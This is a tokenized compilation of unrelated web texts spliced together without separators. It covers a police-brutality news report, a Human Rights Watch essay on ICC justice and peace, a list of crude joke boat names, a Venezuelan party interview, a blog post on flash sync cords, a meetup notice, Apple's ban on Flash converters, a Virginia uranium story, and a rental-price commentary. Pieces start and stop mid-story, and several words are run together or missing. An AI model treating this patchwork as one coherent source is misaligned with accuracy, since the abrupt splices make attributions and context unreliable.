Because the officers on the video were in full riot gear , they could not be readily identified , but authorities are looking into who was on duty that night and where officers were at the time to determine who was involved .
" We did n't know about this videotape until it came out yesterday morning , " he said .
" We had no idea .
It 's kind of caught us by surprise .
As evidence comes out , or we learn more information , we 'll suspend officers as they become identified . "
He added , " Not only is the conduct of the officers on tape excessive -- and clearly it 's excessive -- there are other issues here we need to work through to make sure we 're more organized " in such situations .
The officers on horseback were from the Maryland - National Capital Park Police .
Department spokesman Lt. Stanley Johnson said the mounted officers were there for crowd control purposes .
While " there were a lot of activities " going on that night , he said , no department horses or officers were injured and there were no reports of people being kicked by horses .
In a statement Monday , McKenna 's family told CNN affiliate WJLA - TV in Washington that " some of these characters ought to go to jail .
...
Some ought to merely be booted off the force , and the remainder should be properly trained to discover that force is not always necessary , and brutality is always wrong . "
The U.S. Justice Department is aware of the video and is " looking into it , " Weidenfeld said Tuesday .
She said she is surprised officers would take such action knowing that so many people were filming the celebration .
Prince George 's County police arrested 28 people after the basketball game , WJLA reported .
Of those , 23 were students .
The police department emerged from federal oversight about 14 months ago , according to the station .
The Justice Department had monitored it after complaints about officers using unnecessary force .
The leader of UKIP has appeared on the Campaign Show where he faced questions as to who would vote for his party .
Lord Pearson was also asked about his party 's manifesto saying he was prepared to defend his policies .
The long - running debate about whether seeking justice for grave international crimes interferes with prospects for peace has intensified as the possibility of national leaders being brought to trial for human rights violations becomes more likely .
The International Criminal Court ( ICC ) , which is mandated to investigate and prosecute war crimes , crimes against humanity , and genocide , began operations in 2003 and has already issued its first arrest warrant for a sitting head of state ” ” Sudan ’s President Omar al - Bashir .
That the ICC operates while armed conflicts are ongoing fuels the justice versus peace debate .
Notwithstanding the general recognition that international law obliges countries to prosecute genocide , crimes against humanity , and war crimes , some diplomats tasked with negotiating peace agreements have argued that the prospect of prosecution by the ICC has made achieving their objectives more difficult .
[ 1]
Those negotiating peace have tended to view the possibility of prosecution as a dangerous and unfortunate obstacle to their work .
Some fear that merely raising the spectre of prosecution will bring an end to fragile peace talks .
The temptation to suspend justice in exchange for promises to end a conflict has already arisen with respect to the ICC ’s work in Darfur and Uganda , and threatens to recur in coming years as parties and mediators struggle to negotiate peace deals .
In the short term , it is easy to understand the temptation to forego justice in an effort to end armed conflict .
However , Human Rights Watch ’s ( HRW ) research demonstrates that a decision to ignore atrocities and to reinforce a culture of impunity may carry a high price .
Indeed , instead of impeding negotiations or stalling a peaceful transition , remaining firm on the importance of justice “ ” or at least leaving the possibility for justice open , whether meted out by national or international prosecutions “ ” can yield short - and long - term benefits .
HRW findings about the relationship between peace and justice are discussed at length in a July 2009 report “ Selling Justice Short : Why Accountability Matters for Peace . ”
While there are many factors that influence the resumption of armed conflict , and we do not assert that impunity is the sole causal factor , a review of HRW experience shows that the impact of justice is too often undervalued when weighing objectives in resolving a conflict .
Case studies in the HRW 2009 report are drawn from 20 years of research in as many countries .
The ICC ’s reach has understandably been more limited to date .
Six years after the court ’s operations began , its prosecutor is carrying out investigations in four situations ( Uganda ; Democratic Republic of Congo ; Central African Republic ; and Darfur , Sudan ) and the ICC ’s first trial began in January 2009 .
The prosecutor ’s request to open a fifth investigation ” ” in Kenya ” ” is pending before a pre-trial chamber at the time of writing .
Thus far , however , the ICC ’s engagement in these countries lends support to the themes identified in HRW ’s broader review of the impact of national and international justice processes on “ ” and , critically , their absence from “ ” peace processes .
Drawing on the findings of “ Selling Justice Short ” , we illustrate below three of these themes with examples drawn from the ICC ’s experience to date .
First , arrest warrants do not necessarily hinder , and have at times benefited , peace processes through the marginalization of leaders suspected of serious crimes .
Justice is an important objective in its own right and this marginalization effect should not motivate the commencement of justice processes .
At the same time it has been a side effect of the issuance of arrest warrants in some cases .
In the Uganda situation before the ICC , arrest warrants for leaders of the rebel Lord ’s Resistance Army ( LRA ) appear to have played a role in marginalizing the LRA by isolating it from its base of support in Khartoum .
This , as well as an interest in seeing the ICC arrest warrants lifted , appears to have increased the LRA ’s interest in participating in peace talks held in Juba , Sudan between 2006 - 2008 .
While the Juba talks did not ultimately lead to a final peace agreement , interim agreements “ ” including on the issue of justice for crimes committed during the conflict “ ” were successfully concluded over the course of the talks , suggesting that peace processes can be conducted in the shadow of ICC arrest warrants .
Second , foregoing accountability does not always bring hoped - for benefits .
In the Democratic Republic of Congo ( DRC ) , the inclusion of alleged perpetrators in government “ ” granting de facto amnesties , including to Bosco Ntaganda , a former rebel commander wanted by the ICC but integrated into the Congolese army in early 2009 “ ” has had far - reaching negative consequences .
Successive attempts to buy compliance with post - conflict transition processes by rewarding criminal suspects with positions of power and authority have only allowed these individuals to continue committing crimes or encouraged others to engage in criminal activity in the hope of receiving similar treatment .
Far from bringing peace , this has instead allowed lawlessness and human rights violations to persist .
Third , pursuing international justice can have long - term benefits necessary to sustainable peace , including the reinstatement of the rule of law through domestic prosecutions .
ICC investigations in the Central African Republic , for example , have placed pressure on national authorities to take at least nominal steps toward enforcing international humanitarian law .
While this has not yet yielded domestic prosecutions , it seems to have at least raised awareness of serious international crimes and the rule of law , which may be the first step toward preventing future crimes .
These three themes and examples are dealt with one by one in the paper below .
To read the full paper click here .
* Sara Darehshori is senior counsel and Elizabeth Evenson is counsel in the International Justice Program of Human Rights Watch .
A few weeks ago , I asked for submissions for the Stupidest Boat Names and I was not disappointed .
These are beauties .
Thank You !
This would not of course had been possible without the support of the awesome Scuttlebutt .
I have tried to categorize them and they have been unscientifically grouped in a totally subjective way that made sense to me after a few beers .
I have n't figured my 3 favorites yet but when I do the submitters get CDs of the Top 10 Sailing Songs .
The original list , culled from several web sites , is in the extended posts .
If you have any other names to suggest , I will happily add them .
Here they are :
Appalling Puns
" Hot Ruddered Bum "
" Si yes da "
" L.L. Boat "
" Sail Bad The Sinner "
" Bow Down "
" Sexual Heeling "
" Ahoy Vey "
" Yacht Sea "
" Makin ' Luff "
Financial
" A Crewed Interest "
" Myovadraft "
" The Loan Ranger "
" Colin's Tuition "
Medical
" Biopsea "
" Irritable Bow "
" Bow Movement "
" Sir Osis of the River "
" Vitamin Sea "
" Autopsea "
Sophomoric
" Breakin wind "
" Blow Me "
" Poopy Express "
" Master Baiter "
" My Assiss Dragon "
" Wet Dream "
" Norwegian Woody "
Questionable on a Sailboat
Seen on a Catamaran , " Double Penetration "
" Spank Me " ( Raceboat .
Imagine the T - Shirts )
" Cunning Stunts "
" Rumple IVskin "
Aquamorons
" Blue Vein Throbber "
" Four Play "
" Sea Clit "
" Seaduced Too "
" Hoosier Daddy "
" Dixie Normous " ( they wish )
" Lucky Sperm "
" Show Me The Money "
" Floating Seamen "
" Nauti Lust "
" La -Sea "
Clever
" Maid of Plywood "
" DILLIGAFF " which stands for Do I look like I give a flying f....
" If it does n't come when you call it , why name it " ( An Olympic Trial Finn )
" Weazel " with a tender called " One Eye "
" Change Order " and the dinghy named : " original contract "
" WOFTAM " waste of f'n time and money !
" Miss America " ( Nothing as embarrassing as calling into the race committee to get a slip and saying , Race Committee , this is Miss America " or having to wear the shirts ! )
" Time and Money "
" Head First "
" Sea Cup " ( Skippered by a woman )
" Runs With Scissors "
" Support the Right to Arm Bears "
Relationships
" Do n't tell the wife " How about that on a Mayday ?
Mayday , Mayday , Do n't tell the wife !
" Alternative Girlfriend "
" Mom 's Mink "
" FUJIMO " - ( F___ You Jane , I 'm Moving Out ...
" She Got the House "
" Pissed N Broke "
Obscure
" Dances with Sheep " ( Kiwi Boat )
" The World 's Largest Prairie Dog "
" Shoot Low They 're Riding Chickens "
I am not making this up
There was a yacht at the Arun Yacht Club called " Passing Wind . "
About 10 miles to the west is the Looe Passage , around SDelsey Bill , West Sussex .
A crew member was hit by the boom , and the owner called out the coastguard .
" What is your name and position ? " " We are Passing Wind , in the Looe "
During the recently concluded five - month extraordinary congress of the United Socialist Party of Venezuela , Kiraz Janicke & Federico Fuentes had the opportunity to discuss President Hugo Chavez ’s proposal to form a Fifth Socialist International , with Julio Chavez , a delegate to the PSUV congress and a member of the congress ’s international committee , which is charged with drafting a specific plan of action to form a new socialist international .
The proposal that President Hugo Chavez made regarding the formation of a Fifth Socialist International has attracted a lot of attention at a global level .
I 'm interested in your point of view , as a delegate and member of the International Committee of the Congress of the PSUV , why propose a 5th International and what is the importance of this proposal ?
I believe that the proposal launched by the President Hugo Chávez , to raise at this time a global debate on historical relevance of the need to call on all parties , movements and leftist and anti-imperialist currents of the world to have a full discussion , is based on the characterization and in - depth analysis of the crisis of global capitalism .
This leads unquestionably to the conclusion that the only way to overcome the cyclical crisis of world capitalism is , in fact , by proposing a model or a path that is completely different from the neo-liberal model , the predatory model , of capitalism .
There is no other alternative than the path of transition to socialism .
We believe that discussion of a transitional program , a great debate , should be happen this year in Caracas due to the role that Venezuela is playing as the epicentre of the great transformations that have occurred since the beginning of this century , which have motivated and enthused the peoples of our America , and also for the leading role that Venezuela and President Hugo Chavez are playing at the global level .
We think it is necessary for all these features and for all the situations that have been presented in terms of the aggressive policy of U.S. imperialism against Venezuela , installing military bases , reactivating the Fourth Fleet and generating a media campaign of attacks and insults , both against the revolutionary process and against the leader of this process .
For all these reasons , we believe it is appropriate to the call for an organization , which should have Caracas as the epicentre of a great global debate about the need to advance on a proposal to overcome the contradiction between capital and labour , where the only option , the only alternative we see as viable , feasible as a historical project of life , is precisely the path towards socialism .
We believe therefore , that drawing on the experiences and balances generated by the four previous internationals , which had Europe as their epicentre precisely because of the industrial revolution and the great contradictions that were expressed in the context of rapidly growing capitalism that led to its highest stage , imperialism , that all these contradictions have been transferred to Latin America , and have created in Venezuela the conditions , the features , to make a call of this nature .
I repeat , it must become an organization that is permanent in nature , that is able to summon all the parties of the Left , social movements , prominent individuals and historical currents of thought , and not just specifically those raising the historical project of socialism , but that anti-imperialism should be the common element that brings us all together .
Of course we do n’t just want one more event , one more conference .
We ’re not just making this call to open a discussion , a debate , to produce a document , but to actually set minimum agreements , a minimum transition program , a policy of developing in all the five continents , based on the analysis of the current situation , a characterization of each particular region , to consider expeditiously the transition towards a model that overcomes the contradictions of capital and labour .
Why is anti-imperialism being proposed as the common element and not just socialism ?
We say that this call has to have a broad character , and it is possible that in some countries , such as in the Middle East , there are organizations and movements fighting against some expressions of imperialism and international Zionism as such , but that are not socialist in essence , in the programmatic sense .
But , undoubtedly , they are fighting imperialism .
That ’s why we say that it could be that in some Islamic countries that do not have socialism as an ideological element , for example the case of the Islamic Revolution of Iran , which is anti-imperialist , that this element will be an element that will convoke as many parties , organizations , movements of the world to raise the battle , the confrontation with imperialism .
As well as all those who defend a model based on the worldview of indigenous people , and also the principles and approaches of scientific socialism , elements of regional and Bolivarian thought , the ideas of Mariategui , of Marti , the tree of the three roots in Venezuela [ 1 ] , and all those who are part of a historical , philosophical current that defends the claims accumulated through many years of struggle by the peoples of this part of the world .
From this perspective of an anti-imperialist character , from the vision that has been nurtured by the experience of the historical struggles of indigenous peoples , it is possible to call as many parties , movements , and currents in the world , let us repeat , for a wide - ranging debate , that is full of discussion , in order to agree on a plan , a minimum transition program , to move concretely towards a socialist project at a world level .
An anti-imperialist project is the only way at this juncture , faced with the cyclical crisis of capitalism , in which capitalism is not going to collapse by itself , but is in a process of readjustment , of realignment , of looking for the possibility of a second wind ; we believe that at this juncture is possible to consider an alternative , but that it must be global and anti-imperialist .
There is a core document that we have been discussing within the Congress , in the international committee of the party congress .
A document in which we have assessed and taken stock of what the four previous socialist internationals signified , the context in which they were called , of the proposals , the achievements that they made , and in view of the historical relevance and the a policy of aggression against the Bolivarian revolution and the processes of transformation that have been raised in other countries , we believe that it is possible to produce a document that contains all those elements .
We have even talked about the definition of the historical subject , those who are making the call and who are the social movements , currents and parties in different continents and different countries and who are engaged in a common struggle with us , which is the struggle against imperialism .
Therefore , we believe that through this approach and , of course , discussing what the objectives of this call for a 5th International are – or as we also call it , the First Socialist International of the 21st Century , because there are some discussions with the Communist Party comrades who do not recognize the Fourth International , but we say it is not a question of numbers , but in any case , it would be the first Socialist International of this century – and under these assumptions , by seeking to broaden the programmatic base , the doctrinal principles , with an agenda of topics to discuss , a program to develop , it will be possible to go beyond simply producing a document , but rather to produce an agreement that is expressed in very concrete policies , recognizing the reality of each continent , of each country , and where this effort should lead to the articulation of a powerful global movement to allow us to move forward .
We can move forward on a debate , a discussion about what things we can agree on , opening the possibility that within the meeting there will also be a debate on the whole mechanism of coordination , of integration , beyond governments , because this is not a government event , we are talking about parties , movements , to develop an international policy which has internationalism as a spearhead of counter - hegemonic confrontation .
I think it is possible to discuss all these aspects in Venezuela , and we can then come out of it with a minimum program , a minimum plan of work , again , respecting differences , allowing us to develop a policy around different continents that would have a permanent basis , so that we have the possibility of regular meetings at a continental or regional level , to evaluate the progress of things , but it should also be binding for all organizations , movements and parties that make this call .
Here you touched on a subject that historically has always been complicated , that is , the difference between diplomatic relations of governments and the relations of parties , particularly when some of these parties are also in government , like the PSUV , which was created following the call made by a head of state .
This issue has been raised , for example , about other governments with which Venezuela maintains good diplomatic relations but that are far from being a socialist , where one understands that the State should have diplomatic relations , but where left - wing forces who may be interested in participating [ in the 5th International ] are part of the opposition to these governments .
I think that right now we are having a very interesting debate in the ideological congress of the party .
Remember that , three years ago , we had a founding congress and this is the first ideological congress .
Coincidentally , we are right now finishing the discussion and debate about the programmatic basis for a party which is conceived for the transition to socialism .
We are discussing the values , principles , statutes , and clearly we have been discussing and distinguishing that one thing is the government ’s foreign policy and another thing is the international politics of PSUV .
I think we ’re making a clear conceptualization of these two positions where , undoubtedly , there are levels of convergence because we believe that the PSUV should be a space , a scenario where policy is discussed to be executed precisely at the level of government , in this case in ministries to which international issues apply , of course with the participation , the approval of President Chavez , who is leading the State ’s foreign policy and is at the same time , the party president .
There are things the government and our embassies cannot say , but the PSUV is more likely to express positions from an ideological point of view and this has been a large part of the discussion that has occurred in the national Congress .
So I think we ’re making good progress in differentiating the foreign policy of the government and the party , understanding the peculiarity that in this case the president is the president of the nation and at the same time , the party president .
We have been careful not to get involved in discussions within other countries , to not take positions on issues which correspond to the peoples of those countries and their governments to take .
But in any case , the PSUV is proposing to design , to elaborate a policy , an offensive that allows us to establish contacts at the global level with those organizations and social movements that have been doing solidarity work with Venezuela , which have been supportive of the efforts and initiatives taken by the Bolivarian revolution , with the achievements of the Bolivarian Revolution , and this is giving us a chance to come together and network with many movements with many parties and organizations in the world that share the historical project of socialism , the historical project to overcome the contradiction between capital and labour .
We believe we have made great strides in this need to differentiate what is the government 's foreign policy and what is the party ’s international politics .
Internationalism is enshrined in the statutes in the values and principles , because this is not a party that is thinking only about the transition that is happening in Venezuela .
We are talking about a party that has to assume internationalism , solidarity and to develop the necessary initiatives in terms of confronting imperialism and strengthening policy coordination with those parties , movements and organizations that defend anti-imperialist struggle .
I think we have made significant progress there .
We do not believe that at this moment , just as we are finishing the first ideological congress of the party , that we have the party that we want , but undoubtedly , we have advanced , we have taken very strong steps towards building this powerful instrument within which we can discuss and debate the major issues , major policies , major decisions to advance the transition to socialism .
Has the document drafted by the commission been approved already or is it still under discussion ?
The international commission was charged with the responsibility of drawing up a document .
The document is circulating internally at the party ; it is in the hands of the national leadership and , of course , has been raised for the consideration of the president of the party .
The document is circulating and there have been some comments , and when the president authorizes it , that is the basic document that will be released to encourage and motivate the discussion on the historical relevance and the need to convene all the parties and movements across the world that struggle against imperialism and for the construction of a socialist project .
Obviously , in a revolutionary situation , things cannot simply be determined by a calendar , particularly in the context of the offensive that imperialism has launched in recent months , but is there an idea , at least , of when the founding of the 5th International will be ?
Indeed there is a whole plan of different phases that has been submitted for consideration , where it has been proposed to convoke meetings at a regional or continental level , to create promotional teams , with a strategy for disseminating information so that it can be built from the bottom up .
It is anticipated that all these elements , the creation of an information system , making all the communicational elements that the revolution has been using , all these tools , all these resources , available to the revolution and parties worldwide , will be part of this plan by phases .
There is also the idea of holding various meetings , where there is even the possibility that our delegations will travel to other continents , other countries to discuss , to motivate , to create the conditions for starting to debate the issue .
The Backstory
The Better Solution
A Logical Transition
Double Duty for MultiMedia
We Can Help
__________The Prontor / Compur connection goes back -- way back -- to the days of the Speed Graphic and beyond .
It 's long been a standard for no reason other than , well , it 's long been a standard .
Conveniently , the mere existence of this proprietary connector perpetuates a little cottage industry / sync cord mafia .
And no offense to sync cord manufacturers themselves , the design of the connector means that it is not that easy to manufacture a good version in a cord .
Crappy PC cords are , of course , the bane of our existence as photographers .
They get loose .
They fail intermittently .
We even buy little key chain fob tools to bend them back into shape .
And even then , decent ( > $ 20 ) cords that have to be periodically replaced amount to what is basically an ongoing -- and inflated -- tax on photographers .
The PC jack carries exactly one electrical circuit .
It is simply a mechanism to close a switch and fire a flash .
This could be accomplished by just about any type of connector , but the most logical candidate for replacement is the cheap , lowly reliable 1/8 " ( or , 3.5 m m ) audio jack .
If the camera industry were to standardize on the 1/8 " jack , proprietary sync cords would become a thing of the past .
Audio patch cords are much cheaper , and just as reliable .
Case in point : My AlienBees and PocketWizards both use standard , 1/8 " jacks .
( Thank you both , Paul at AB and Jim at PW , for that . )
Cords are always going to be cords .
They get moved around , blown around , serve as lanyard ( I know -- I 've seen me do it ) and get strained .
Eventually cords are going to go bad .
But with a 1/8 " based cord as a sync cord , the easy solution is to buy them by the dozen .
You can get them for next to nothing all over the 'net .
So each of my AB head cases have four or five brand new 1 - foot sync cords , still in plastic .
Thus , will I never have a sync cord issue .
Not so with my PW - to - SB800 connection .
The SB800 speedlight has a PC sync , which means that even short cords are $ 10 - $ 20 , depending on the brand .
SO my solution is to hope they continue to work .
Which , of course , one day they will not .
It appears that flashes alreadyto go 1/8 " .
PWs are there .
ABs are there .
Several other brands of studio flashes are there .
When MPEX came to me for design input for the quad - sync LP120 , the first thing I suggested was a 1/8 " sync jack .
Moishe being Moishe , he also included the hot shoe , PC jack and a slave .
It 's a " guy " thing -- sync overkill .
Gotta love it .
The next step was to create the Universal Translator , which mounts on a camera or flash , passes sync through bottom to top via the shoe , and adds but PC and 1/8 " sync to either .
The LP120 is , as far as I know , the only hot - shoe - sized flash sporting a 1/8 " jack .
And that has been responsible for much of the exposure it has gotten on widely read blogs such as WIRED Gadget Lab and BoingBoing , among others .
It is cool , logical and next - step thinking .
I know of one other flash in the works which will support 1/8 " sync , too .
Tell ya more , but I 'd have to kill ya .
In short , the transition is starting to happen , and the desire for a non-ridiculous sync is proving that the 1/8 " sync is seen as a value - added feature .
And the 1/8 " jack is cheaper to add than is a PC jack .
So take away a PC jack in the process , and you actually save manufacturing costs by making the flash better .
Not surprisingly , there is even a cottage industry in making ( for example ) Canon flashes better after the fact by adding a 1/8 " sync jack .
It does n't take Fake Chuck Westfall to see that this is a logical feature .
One of the additional beauties of the 1/8 " standard is that it does not have to be a single - circuit connector .
It can carry two or even three circuits .
Think stereo audio cord , or full A/V coming out of your iPod headphone jack .
Woooo , high - tech , huh ?
But still ahead of the sync cord folks .
And even 3 - circuit 1/8 " cords are cheaper than PC cords .
With just one extra circuit included in the 1/8 " jack on the RadioPopper JrXs , Kevin and the guys are adding the ability to remotely dial in a flash 's power level .
So why not add a 1/8 " jack on a DSLR ?
Amazingly , many modelsa jack on the camera .
It 's just being used for output to a video monitor , for viewing stills ( or movies ) on your TV .
Think about it .
By just keeping the pre-existing hardware , camera manufacturers could use software to configure the jack based on menu choices or sensing the voltage in the cord that is plugged into the jack .
A single , 1/8 " jack could be a video out in play mode , a mic( hello ) in video record mode and a much better sync jack in still photo mode .-- proprietary PC cords are obsolete , cameras are improved and costs are reduced on both ends .
I think it will be the hot - shoe flashes that will transition to the new standard first .
It is not expected that they include the stupid , legacy PC connector .
And I would love to do whatever I can to help to speed the changeover .
To that end , if your company announces a hot shoe flash in 2010 that includes a 1/8 " sync jack , I will use this site to tell hundreds of thousands of peopleabout it .
Two caveats : First , your flash must be available internationally .
And if it is a total piece of crap other than the 1/8 " part I am not going to omit that little tidbit .
Long story short , 1/8 " hot shoe flashes will get noticed here .
Ditto any new cameras that either add a 1/8 " hard sync jack or repurpose an existing 1/8 " AV jack to function as a sync jack in still mode : I can promise you , when cameras start releasing photographers from the hot shoe and / or PC mafia , that will be news here , too .
This PC cord monster is a snake with a head at both ends , and we pretty much have to kill it twice .
If you support this idea , please do what you can to spread it .
Blog it , tweet it , Facebook it , nail it to the door of the PC Church a la Martin Luther -- whatever .
I 'd love for us to help make this happen .
Huzzah .
Before I say anything else , I wanna take a second to thank everyone who came out for Kegs & Eggs .
Small group ( considering the timing of the event ) , but we rocked the hell out of that night / morning .
Should have some pictures up soon .
That said ...
Yeeeaaahhh karaoke .
A lot of people have been throwing around requests for a karaoke event throughout the past couple of meetups , so let 's hit this up .
Next Saturday ( March 20th , 2010 ) , we 'll be at Cafe Peyote in Adams Morgan around 9:30 PM .
Feel free to come on out , drink , sing , and meet other Redditors in the area .
If you 're wondering how to find us ... well , I guarantee you that there 'll only be one group with a stuffed purple shark .
We 'll be pretty hard to miss !
- Ryan , who has a strange attraction to fish now
NOTE : This is taking place on March 20th .
Today , Apple revised its iPhone Developer Program License Agreement to effectively ban the use of the Flash - to - iPhone converter .
Throughout 2010 , Steve Jobs and Apple made it very clear that they do not like Adobe .
At all .
They prominently left Flash off the iPad , instead promoting HTML5 at every opportunity .
For some time now , though , Adobe 's had a tool to circumvent Apple 's ban on Flash for the iPhone and iPad : the Adobe Creative Suite 5 Flash - to - iPhone converter , which would have allowed developers to create apps in Flash and then port them over into iPhone .
The new change to the iPhone Developer Program License Agreement , which comes as part of the release of the new iPhone OS SDK for developers , changes all that .
Originally section 3.3.1 was only a sentence long , but now it has gained several more .
Here 's the new wording of the policy in question :
" 3.3.1 — Applications may only use Documented APIs in the manner prescribed by Apple and must not use or call any private APIs .
Applications must be originally written in Objective -C , C , C++ , or JavaScript as executed by the iPhone OS WebKit engine , and only code written in C , C++ , and Objective - C may compile and directly link against the Documented APIs ( e.g. , Applications that link to Documented APIs through an intermediary translation or compatibility layer or tool are prohibited ) . "
As Daring Fireball 's John Gruber points out , the new language almost certainly means that cross-compilers are banned — you have to build iPhone apps within Apple 's pre-approved programming languages or watch your app be denied access to Apple 's app stores .
Given Apple 's history with Adobe , it 's very likely that this change was a direct assault on Adobe , whose CS5 suite prominently advertises the Flash - to - iPhone compiler as a feature .
By neutering it , Apple deals another blow to Flash .
It 's also a major setback for any developers that were building iPhone apps with Flash as a backbone — they almost certainly have to start from square one .
What happens when you discover uranium in your backyard .
As is often the case with tales of great discovery , the details of how buried treasure came to be found beneath the rolling countryside of Pittsylvania County , Virginia , have grown a little gauzy over the last 30 years .
But here is the story as the prospectors tell it .
One day , in March 1979 , a man named Byrd Berman , a geologist by training , was driving down a road through cattle pastures when the scintillometer sitting on the dashboard of his Hertz rental car began to beep .
The device , similar to a Geiger counter , was designed to detect the gamma radiation naturally emitted by uranium .
As he watched the needle on the scintillometer dance , Berman was certain he’d hit something huge , fissile , and extraordinarily valuable .
Uranium , as everyone knows , is used to make the fuel for nuclear reactors , and , at the time , it was in huge demand .
Nuclear power was considered to be the energy source of the future , and America was in the midst of building or planning hundreds of plants .
All of them needed uranium .
Berman was working for a company called Marline Uranium and a boss named Al Swanson , who was himself something of a prospecting legend .
Swanson had discovered a rich uranium strike in his home country of Canada , and he thought he saw some geological similarities to that deposit along America ’s eastern seaboard .
Specifically , he was intrigued by a vast network of depressions known as the Triassic Basins , formations created around 200 million years ago by the tectonic processes that split North America from Africa , opening up the Atlantic Ocean .
Swanson dispatched men to canvass the basins from North Carolina to New Jersey , but , for a long time , nothing panned out -- until Byrd Berman happened to drive past the right farm .
Returning to the company ’s office , Berman knew he ’d hit a memorable strike .
“ I came in and I said there was no question in my mind that we had fifty million pounds , ” Berman recalled recently .
“ I was kind of conservative . ”
The next day , he returned to the same place with another Marline geologist , Henry Singletary .
When they got to the right spot , the prospectors pulled over .
“ Him being senior man on the thing , it was me that had to get down in the muddy ditch and dig the sample , ” Singletary says .
He took a hammer and knocked loose a few pieces of rock , which gave an off - the - charts reading for radioactivity .
Later , the samples were found to contain four to five times as much uranium as is typically found in commercial mines .
And it was right there at the surface , meaning the ore would be fairly simple to extract .
“ I said , ‘ Well , here ’s the biggest find in a long time of uranium , ’ ” Berman recalls .
That night , he went back to his hotel room savoring his luck .
“ I turned on the television and what were they talking about ?
They were talking about a strange place called Three Mile Island . ”
That very day , as Berman remembers it , there had been an accident at a nuclear plant in Pennsylvania .
( The coincidental timing may sound like a tall tale , but Singletary ’s memory was similar :
He thinks their discovery occurred the same week as Three Mile Island , though maybe not the same day . )
While there were no deaths as a result of the partial meltdown , a significant amount of radioactive gas escaped into the atmosphere .
The accident -- combined with the release of a reactor disaster movie , The China Syndrome , around the same time -- would transform the way Americans regarded nuclear power .
“ So I was elated in the morning , ” Berman says , “ and , by night , it fell apart . ”
What Berman and Singletary had found is today thought to be one of the ten richest uranium deposits in the world -- containing up to 120 million pounds .
But , while Marline did a lot of exploratory drilling in the area , the company never got to dig it up .
Amid the anti-nuclear backlash that followed Three Mile Island , Virginians rose up in protest against Marline ’s mining plans .
Actress Sissy Spacek , recently transplanted to a farm outside Charlottesville , visited the state capitol to tell starstruck legislators about alleged connections between uranium and cancer , and Governor Charles Robb signed a moratorium on mining uranium , which was meant to give the state government time to impose regulations .
Instead , while a task force deliberated , market forces finished the work environmentalists had begun .
U.S. utilities pulled the plug on roughly 100 planned nuclear plants , partly due to safety issues , but also because reactors already under construction were going way over budget .
In 1984 , the state uranium task force issued a qualified endorsement of mining , concluding it could be done with stringent safeguards .
But Marline had run into financing problems and abandoned the project .
The moratorium stayed in place .
Meanwhile , the nuclear power industry went into a long period of somnolence , and nearly all of America ’s uranium mines closed down .
Berman and Singletary ’s discovery was left in the ground -- though it was never quite forgotten .
The first iPad ad debuted a short while ago during the Oscars .
Check it out below .
Thoughts on the commercial ?
We think it ’s okay .
The song choice is mediocre by Apple standards , and the quick cuts move a bit too quickly to really appreciate what the iPad can do .
Still , a pleasant reminder that the iPad is just about 3 weeks away from launch .
And lo and behold , Steve Jobs is in attendance as well !
Nice to see ole ’
Jobs livin it up on the town , no doubt because Pixar ’s UP is nominated for 5 awards .
And can you spot Waldo , uh , I mean Jobs , in this photo courtesy of CNET ?
Your browser is out of dateor some of its features are disabled , it may not display this website or some of its partscorrectly .
To make sure that all features of this website work , please update your browserto the latest version and check that Javascript and Cookies are enabled .
Alternatively you can navigate to a legacy version of the website , which is compatible with older browsers : http://liveskor888.com.
→ Washington ’s Blog
Preface : Rental prices are important not only for renters and apartment owners , homeowners and the building industry , but also because they greatly influence the consumer price index ( see this and this ) .
As the Federal Reserve Bank of San Francisco noted today :
Part of the drop in measured core inflation is undoubtedly due to the deceleration in the price of housing .
The declines in housing inflation have been more profound than in core inflation .
The 12 - month percentage change in rents and owners ’ equivalent rents has come down from 4.5 % in February 2007 , at the height of the housing bubble , to 0.3 % in February 2010 .
This decline in the rate of housing price increases reflects reduced upward pressure on rents , which in turn is due to historically high vacancy rates for rental properties .
Because house price inflation is now below core inflation , it drags down the overall level of core inflation .
There are many factors which affect rental prices , including : ( 1 ) the general health of the economy ; ( 2 ) demographics ; ( 3 ) housing strength ; ( 4 ) population growth ; ( 5 ) migration patterns ; and ( 6 ) wealth distribution .
The General Health of the Economy
The relation between housing sales and rentals cannot be examined in a vacuum .
The general health of the economy is important as well .
For example , as the Newark Law Review notes :
During the depression years , there was a widespread tendency among tenants to seek reduction of the previously established rental for the premises they occupied , basing their pleas on a general shrinkage of incomes .
Many of these requests were complied with , landlords realizing that rentals stipulated in boom days before the crash were far above the price for which other premises were available .
This is not just of historical interest , given that many financial experts think this could be worse than the Great Depression .
And see this .
In addition , banks still are not lending to most individuals .
So for now , the credit crunch is still playing a role .
The effects of a credit shortage are complicated .
As USA Today noted in 2008 :
Several factors are driving up demand for rentals : *** • Renters are finding it harder to buy .
Many renters can’t qualify for an affordable mortgage because of stricter lending rules that call for larger down payments and excellent credit .
The days of getting a home with no money down or with other unconventional loan structures are gone .
Lenders have turned more cautious for good reason : Foreclosures are up , and each of them costs lenders an estimated $ 50,000 , on average , in processing fees , liquidation - sale price cuts and other costs , according to the Center for Responsible Lending .
“ We ’ve seen demand for rental housing go up , ” says Mark Obrinsky , chief economist at the National Multi Housing Council .
“ The ownership side is retrenching , and we ’re seeing the demand going to the rental side .
There ’s a lot of hesitancy to buy .
Others ca n’t get ( financing ) , so they ’re remaining renters longer . ”
Another writer listed other potential effects of a credit shortage :
People who ca n’t sell their home may try to rent it out .
( Pushes rental prices down . ) [ and ]
People who buy cheap homes for investment purposes may rent them out until the market recovers .
( Pushes rental prices down . )
On the other hand , if the economy improves more quickly than most imagine , rental prices might be pushed up along with everything else .
Demographics
The American population is rapidly aging .
As I wrote in October :
As I have previously noted , Japan ’s population is rapidly aging , and the U.S. age pyramid – while not as bad – is not nearly as young as that of Brazil or India ’s :
Which countries have the best demographics ?
Let ’s start by looking at the “ age pyramid ” for the United States .
The following 2 charts from the National Institutes of Health shows that the population is aging :
This graphic ( courtesy of Ed Stephan ) shows the U.S. age pyramid from from 1950 through 2050 : male female Population of the United States , by Age and Sex ,
1950 - 2050 ( millions )
supplied pyramids were modified using Canvas , GraphicConverter and GIFBuilder .
information source : International Data Base , U.S. Census Bureau ; supplied pyramids were modified using Canvas , GraphicConverter and GIFBuilder .
[ If you ca n’t see the dates at the bottom of the pyramid , click here ] .
As NIH notes :
The first of the postwar baby boom cohort , born 1946 – 1964 , will turn 55 years in 2001 .
In just three decades , an extraordinary change in the age structure of the United States is anticipated .
By 2030 , one in five persons ( 20 % of the U.S. population ) will be aged 65 or older , increasing from the present ratio of one in nine persons ( 12.8 % ) .
The number of persons in the 65 and older age group will more than double , increasing from the current 34 million persons to 70 million persons .
